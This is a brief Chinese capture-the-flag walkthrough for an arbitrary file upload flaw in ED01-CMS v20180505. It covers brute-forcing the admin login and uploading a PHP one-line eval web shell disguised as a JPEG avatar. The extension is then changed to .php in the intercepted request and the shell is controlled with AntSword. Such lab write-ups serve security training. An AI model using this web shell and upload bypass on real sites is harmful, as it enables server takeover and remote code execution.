目录
[获取 flag](#获取 flag)

靶标介绍
ED01-CMS v20180505 存在任意文件上传漏洞
开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg
1.jpg:
<?php @eval($_POST[cmd]);?>
勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包


放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag
